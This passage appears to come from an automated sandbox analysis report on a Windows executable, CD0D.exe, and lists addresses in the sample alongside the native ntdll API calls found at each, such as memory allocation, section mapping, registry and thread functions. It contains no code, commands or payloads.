Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94D294 ZwQueryAttributesFile,RtlFreeHeap,ZwClose,RtlFreeHeap, 22_2_6A94D294
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95AA90 ZwQuerySystemInformationEx, 22_2_6A95AA90
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91429E RtlInitUnicodeString,ZwClose,LdrQueryImageFileKeyOption, 22_2_6A91429E
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A932280 RtlAcquireSRWLockExclusive,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive,ZwTerminateProcess, 22_2_6A932280
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95B280 ZwWow64DebuggerCall, 22_2_6A95B280
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94DA88 RtlAcquireSRWLockExclusive,RtlImageNtHeader,RtlAllocateHeap,ZwUnmapViewOfSection,ZwClose,RtlReAllocateHeap, 22_2_6A94DA88
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959AB0 ZwWaitForMultipleObjects, 22_2_6A959AB0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94E2BB ZwWaitForAlertByThreadId, 22_2_6A94E2BB
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A911AA0 RtlAllocateHandle,RtlReAllocateHeap,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlAllocateHeap, 22_2_6A911AA0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A945AA0 TpSetPoolMaxThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMaxThreads, 22_2_6A945AA0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9152A5 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwFsControlFile,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,ZwClose,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection, 22_2_6A9152A5
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93FAD0 RtlAcquireSRWLockShared,RtlDllShutdownInProgress,ZwWaitForAlertByThreadId,RtlAcquireSRWLockShared,ZwTerminateProcess, 22_2_6A93FAD0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8ADD RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E8ADD
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A1AD6 ZwFreeVirtualMemory, 22_2_6A9A1AD6
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95AAC0 ZwQueryWnfStateNameInformation, 22_2_6A95AAC0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95AAE0 ZwRaiseException, 22_2_6A95AAE0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959AE0 ZwTraceEvent, 22_2_6A959AE0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A915210 RtlGetCurrentDirectory_U,memcpy,RtlGetCurrentDirectory_U,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 22_2_6A915210
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8214 RtlAcquireSRWLockExclusive,ZwSetInformationWorkerFactory,RtlReleaseSRWLockExclusive, 22_2_6A9E8214
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959A00 ZwProtectVirtualMemory, 22_2_6A959A00
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94B230 EtwEventWrite,ZwTraceEvent,RtlNtStatusToDosError,EtwEventWrite, 22_2_6A94B230
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959A30 ZwTerminateThread, 22_2_6A959A30
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A918239 RtlInitUnicodeStringEx,ZwQueryValueKey,RtlInitUnicodeStringEx,RtlPrefixUnicodeString,ZwEnumerateKey,ZwOpenKey,RtlInitUnicodeStringEx,ZwQueryValueKey,RtlFreeHeap,ZwClose,RtlAllocateHeap,RtlCompareUnicodeString,ZwClose,RtlFreeHeap,ZwClose, 22_2_6A918239
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A914A20 RtlGetCurrentServiceSessionId,RtlFreeHeap,ZwClose,RtlReleaseActivationContext,LdrUnloadDll, 22_2_6A914A20
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93A229 ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint, 22_2_6A93A229
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A919240 ZwClose,ZwClose,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlFreeHeap, 22_2_6A919240
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A1242 ZwUnmapViewOfSection,ZwClose,ZwClose,ZwClose,ZwClose,ZwClose, 22_2_6A9A1242
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8A62 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E8A62
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A912B93 TpSetDefaultPoolMaxThreads,ZwDuplicateToken, 22_2_6A912B93
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94939F RtlInitializeCriticalSectionEx,ZwDelayExecution, 22_2_6A94939F
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D138A memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9D138A
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E9BBE RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E9BBE
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8BB6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E8BB6
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95A3A0 ZwGetCompleteWnfStateSubscription, 22_2_6A95A3A0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D1BA8 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9D1BA8
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A944BAD RtlAcquireSRWLockExclusive,memset,ZwTraceControl,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 22_2_6A944BAD
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A912BC2 ZwOpenThreadToken,ZwSetInformationThread,ZwClose, 22_2_6A912BC2
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959BF0 ZwAlertThreadByThreadId, 22_2_6A959BF0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9123F6 ZwClose,RtlFreeHeap, 22_2_6A9123F6
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A92A3E0 RtlFormatCurrentUserKeyPath,ZwQueryInformationToken,RtlLengthSidAsUnicodeString,RtlAppendUnicodeToString,RtlConvertSidToUnicodeString,RtlFreeUnicodeString, 22_2_6A92A3E0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D131B RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9D131B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A914B00 TpCallbackMayRunLong,TpCallbackMayRunLong,ZwSetInformationWorkerFactory, 22_2_6A914B00
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A945306 ZwReleaseKeyedEvent, 22_2_6A945306
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959B00 ZwSetValueKey, 22_2_6A959B00
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A919335 ZwClose,ZwClose, 22_2_6A919335
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8B58 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E8B58
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A943B48 ZwClose,ZwClose, 22_2_6A943B48
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95AB70 ZwReleaseWorkerFactoryWorker, 22_2_6A95AB70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A8372 ZwClose,RtlStringFromGUIDEx,ZwCreateKey,RtlFreeUnicodeString, 22_2_6A9A8372
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A943B7A RtlAllocateHeap,ZwQuerySystemInformationEx,memset,RtlFreeHeap, 22_2_6A943B7A
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A912B7E ZwSetInformationThread,ZwClose, 22_2_6A912B7E
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95AB60 ZwReleaseKeyedEvent, 22_2_6A95AB60
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9C6369 RtlInitUnicodeString,ZwOpenFile,ZwCreateSection,ZwMapViewOfSection,ZwClose,ZwClose, 22_2_6A9C6369
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A6365 RtlAllocateHeap,ZwQueryVirtualMemory,memcpy,wcsrchr,RtlFreeHeap,RtlAllocateHeap,memcpy, 22_2_6A9A6365
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93E090 RtlWow64EnableFsRedirectionEx,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent, 22_2_6A93E090
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95A890 ZwQueryDebugFilterState, 22_2_6A95A890
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959890 ZwFsControlFile, 22_2_6A959890
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A913880 TpSetWaitEx,RtlAllocateHeap,ZwGetCompleteWnfStateSubscription,RtlFreeHeap,TpSetWaitEx, 22_2_6A913880
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94A080 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection, 22_2_6A94A080
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95108B ZwClose, 22_2_6A95108B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95B0B0 ZwTraceControl, 22_2_6A95B0B0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94F0BF ZwOpenFile,RtlFreeHeap,ZwQueryVolumeInformationFile,RtlAllocateHeap,memcpy,ZwClose,ZwClose,RtlFreeHeap, 22_2_6A94F0BF
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9418B9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose, 22_2_6A9418B9
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93F0AE ZwSetInformationWorkerFactory, 22_2_6A93F0AE
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9C60A2 ZwQueryInformationFile, 22_2_6A9C60A2
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9510D7 ZwOpenKey,ZwCreateKey, 22_2_6A9510D7
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9598D0 ZwQueryAttributesFile, 22_2_6A9598D0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95A0D0 ZwCreateTimer2, 22_2_6A95A0D0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9170C0 ZwClose,RtlFreeHeap,RtlFreeHeap, 22_2_6A9170C0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9500C2 ZwAlertThreadByThreadId, 22_2_6A9500C2
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91B8F0 TpSetPoolStackInformation,ZwSetInformationWorkerFactory, 22_2_6A91B8F0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9140FD RtlImageNtHeaderEx,DbgPrintEx,memset,RtlDebugPrintTimes,DbgPrintEx,wcsstr,DbgPrintEx,DbgPrintEx,wcschr,DbgPrintEx,ZwSetInformationProcess, 22_2_6A9140FD
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9C60E9 ZwOpenKey,ZwClose,ZwClose, 22_2_6A9C60E9
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9EF019 RtlInitUnicodeString,RtlInitUnicodeString,ZwQueryValueKey,RtlAllocateHeap,ZwQueryValueKey,RtlInitUnicodeString,ZwClose,RtlFreeHeap, 22_2_6A9EF019
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91F018 RtlAllocateHeap,ZwQueryValueKey,memcpy,RtlFreeHeap, 22_2_6A91F018
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959830 ZwOpenFile, 22_2_6A959830
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A944020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion, 22_2_6A944020
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A915050 RtlSetCurrentDirectory_U,RtlAllocateHeap,RtlFreeHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,RtlSetCurrentDirectory_U,RtlFreeHeap,RtlFreeHeap, 22_2_6A915050
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959850 ZwQueryDirectoryFile, 22_2_6A959850
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8858 ZwAlertThreadByThreadId, 22_2_6A9E8858
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959840 ZwDelayExecution, 22_2_6A959840
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A1879 ZwAllocateVirtualMemory,memset,RtlInitializeSid, 22_2_6A9A1879
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A92106F ZwOpenKey,ZwClose, 22_2_6A92106F
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959990 ZwQueryVolumeInformationFile, 22_2_6A959990
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91519E RtlEqualUnicodeString,RtlLeaveCriticalSection,ZwClose,RtlFreeHeap, 22_2_6A91519E
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93C182 RtlGetCurrentServiceSessionId,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwWaitForAlertByThreadId,RtlAcquireSRWLockExclusive, 22_2_6A93C182
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9DA189 RtlAcquireSRWLockExclusive,ZwGetNlsSectionPtr,RtlAllocateHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive, 22_2_6A9DA189
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95B180 ZwWaitForAlertByThreadId, 22_2_6A95B180
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959980 ZwCreateEvent, 22_2_6A959980
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9C6186 ZwQueryValueKey,memmove,RtlInitUnicodeString, 22_2_6A9C6186
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95A9B0 ZwQueryLicenseValue, 22_2_6A95A9B0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9951BE ZwQuerySystemInformation,ZwQuerySystemInformationEx,RtlAllocateHeap,ZwQuerySystemInformationEx,RtlFindCharInUnicodeString,RtlEnterCriticalSection,memcpy, 22_2_6A9951BE
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95B1A0 ZwWaitForKeyedEvent, 22_2_6A95B1A0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9D49A4 ZwAllocateVirtualMemory,RtlCompareMemory,memcpy,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint, 22_2_6A9D49A4
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A19C8 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose, 22_2_6A9A19C8
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E89E7 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E89E7
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A919100 TpReleasePool,RtlAcquireSRWLockExclusive,ZwShutdownWorkerFactory,RtlGetCurrentServiceSessionId,TpReleasePool,TpReleasePool,RtlDebugPrintTimes,TpReleasePool, 22_2_6A919100
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A920100 LdrUnloadAlternateResourceModuleEx,RtlAcquireSRWLockExclusive,ZwUnmapViewOfSection,ZwClose,LdrUnloadAlternateResourceModuleEx,RtlFreeHeap,RtlFreeHeap,RtlReAllocateHeap, 22_2_6A920100
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959900 ZwOpenEvent, 22_2_6A959900
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9B5100 RtlAssert,RtlCaptureContext,DbgPrintEx,DbgPrompt,ZwTerminateThread,DbgPrintEx,RtlAssert,ZwTerminateProcess, 22_2_6A9B5100
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A193B ZwRaiseException,ZwTerminateProcess, 22_2_6A9A193B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95A130 ZwCreateWaitCompletionPacket, 22_2_6A95A130
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9EF13B ZwOpenKey,ZwCreateKey, 22_2_6A9EF13B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959920 ZwDuplicateToken, 22_2_6A959920
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91F150 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey, 22_2_6A91F150
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95B150 ZwUnsubscribeWnfStateChange, 22_2_6A95B150
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91395E RtlAcquireSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,ZwGetCompleteWnfStateSubscription,RtlFreeHeap, 22_2_6A91395E
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93B944 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,RtlGetCurrentServiceSessionId,ZwSetTimer2,RtlGetCurrentServiceSessionId,ZwCancelTimer2, 22_2_6A93B944
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91B171 ZwQueryDebugFilterState,_alloca_probe_16,memcpy,_vsnprintf,ZwWow64DebuggerCall,RtlRaiseException, 22_2_6A91B171
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A1976 ZwCreateEvent, 22_2_6A9A1976
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95B160 ZwUpdateWnfStateData, 22_2_6A95B160
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95A160 ZwCreateWorkerFactory, 22_2_6A95A160
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8966 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E8966
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9CBE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 22_2_6A9CBE9B
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap, 22_2_6A94DE9E
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A912E9F ZwCreateEvent,ZwClose, 22_2_6A912E9F
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A913E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A913E80
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E3EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error, 22_2_6A9E3EBC
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93E6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket, 22_2_6A93E6B0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A2EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9A2EA3
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A949ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId, 22_2_6A949ED0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9596D0 ZwCreateKey, 22_2_6A9596D0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9166D4 RtlInitUnicodeString,ZwQueryValueKey, 22_2_6A9166D4
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E8ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9E8ED6
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A912ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId, 22_2_6A912ED8
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9596C0 ZwSetInformationProcess, 22_2_6A9596C0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A16FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration, 22_2_6A9A16FA
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91B6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError, 22_2_6A91B6F0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A96DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus, 22_2_6A96DEF0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A93E6F9 ZwAlpcSetInformation, 22_2_6A93E6F9
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9596E0 ZwFreeVirtualMemory, 22_2_6A9596E0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A2E14 RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9A2E14
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91C600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy, 22_2_6A91C600
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A91B630 ZwWaitForKeyedEvent, 22_2_6A91B630
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9CFE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A9CFE3F
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959E30 ZwCancelWaitCompletionPacket, 22_2_6A959E30
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959E20 ZwCancelTimer2, 22_2_6A959E20
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9E3E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error, 22_2_6A9E3E22
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95B650 RtlUnhandledExceptionFilter,ZwTerminateProcess, 22_2_6A95B650
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959650 ZwQueryValueKey, 22_2_6A959650
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A6652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection, 22_2_6A9A6652
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95B640 RtlUnhandledExceptionFilter,ZwTerminateProcess, 22_2_6A95B640
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95AE70 ZwSetInformationWorkerFactory, 22_2_6A95AE70
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A959670 ZwQueryInformationProcess, 22_2_6A959670
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction, 22_2_6A94BE62
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9A5780 DbgPrompt,ZwWow64DebuggerCall, 22_2_6A9A5780
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9C5F87 ZwUnmapViewOfSection, 22_2_6A9C5F87
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A912FB0 RtlDestroyHeap,RtlDeleteCriticalSection,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlDestroyHeap,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,RtlGetCurrentServiceSessionId,ZwTraceEvent, 22_2_6A912FB0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A9597A0 ZwUnmapViewOfSection, 22_2_6A9597A0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A953FA0 RtlGetLocaleFileMappingAddress,ZwInitializeNlsFiles,RtlGetLocaleFileMappingAddress,ZwUnmapViewOfSection, 22_2_6A953FA0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A95AFD0 ZwShutdownWorkerFactory, 22_2_6A95AFD0
Source: C:\Users\user\AppData\Local\Temp\CD0D.exe Code function: 22_2_6A94DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence, 22_2_6A94DFDF
